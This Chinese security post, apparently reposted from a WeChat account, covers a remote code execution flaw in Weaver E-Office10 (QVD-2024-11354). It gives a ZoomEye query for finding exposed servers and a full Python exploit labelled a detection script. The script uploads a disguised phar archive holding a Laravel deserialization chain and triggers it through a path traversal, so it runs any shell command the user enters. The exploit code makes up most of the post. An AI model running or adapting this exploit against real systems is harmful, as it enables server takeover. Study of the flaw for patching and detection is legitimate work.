1 产品简介
2024年3月,互联网上披露泛微E-Office10存在远程代码执行漏洞,攻击者可利用该漏洞获取服务器控制权限。该漏洞利用简单,无需前置条件,建议受影响的客户尽快修复漏洞。
2 漏洞描述
3 zoomeye语法
app:"泛微 E-office 10"
4 检测脚本
# -*- coding:utf-8 -*- import json import requests import urllib3 import hashlib import time from hashlib import sha1 import base64 def payload(url,cmd): urls = url + '/eoffice10/server/public/api/attachment/atuh-file' hearder = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5829.201 Safari/537.36'} file = base64.b64decode("PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQokAQAAAQAAABEAAAABAAAAAADuAAAATzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjE6e3M6MTY6IgAqAHF1ZXVlUmVzb2x2ZXIiO3M6Njoic3lzdGVtIjt9czo4OiIAKgBldmVudCI7TzozODoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcQnJvYWRjYXN0RXZlbnQiOjE6e3M6MTA6ImNvbm5lY3Rpb24iO3M6Njoid2hvYW1pIjt9fQgAAAB0ZXN0LnR4dAUAAAAqH6ZhBQAAAOmPsbu0AQAAAAAAAHRlc2F05eRmN0jjnqjxPuyQ7MEQ33p3j+QCAAAAR0JNQg==") # print(file) data = file[:-28] # print(b's:'+bytes(str(len(cmd)),encoding="utf-8")+b':"'+bytes(cmd, encoding='utf-8')+b'"') data = data.replace(b's:6:"whoami"', b's:'+bytes(str(len(cmd)),encoding="utf-8")+b':"'+bytes(cmd, encoding='utf-8')+b'"') final = file[-8:] newfile = data + sha1(data).digest() + final upload_file = {"Filedata": ("register.inc", newfile, "image/jpeg")} urllib3.disable_warnings() response = requests.post(url=urls, files=upload_file, headers=hearder) # ,proxies=proxy) response_text = response.text attachment_id = json.loads(response_text)['data']['attachment_id'] urls = url + '/eoffice10/server/public/api/wps/v1/3rd/file/history' heards = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5829.201 Safari/537.36', 'x-weboffice-file-id': attachment_id } urllib3.disable_warnings() response = requests.post(url=urls, headers=heards, verify=False) # ,proxies=proxy) response_json = response.json() filename = str(response_json["histories"][0]["create_time"]) + 'register.inc' md5name = hashlib.md5(filename.encode()) md5name = md5name.hexdigest() Time = time.strftime('%Y/%m/%d', time.localtime(time.time())) urls = url + '/eoffice10/server/public/api/dingtalk/dingtalk-move?imgs=phar://../../../../attachment/' + Time + '/' + attachment_id + '/' + md5name + '.inc' hearder = { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5829.201 Safari/537.36'} urllib3.disable_warnings() print(urls) response = requests.post(url=urls, verify=False, headers=hearder) # ,proxies=proxy) response_text = response.text print(response_text) result = response_text.split('}')[-1] print(result) if __name__ == '__main__': url = input("url: ") cmd = input("要执行的命令: ") if not url.startswith(("http://", "https://")): url = "http://" + url if url.endswith("/"): url = url[:-1] payload(url,cmd)
原文始发于微信公众号(棉花糖网络安全圈):QVD-2024-11354 泛微E-Office10 远程代码执行漏洞[附py脚本]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论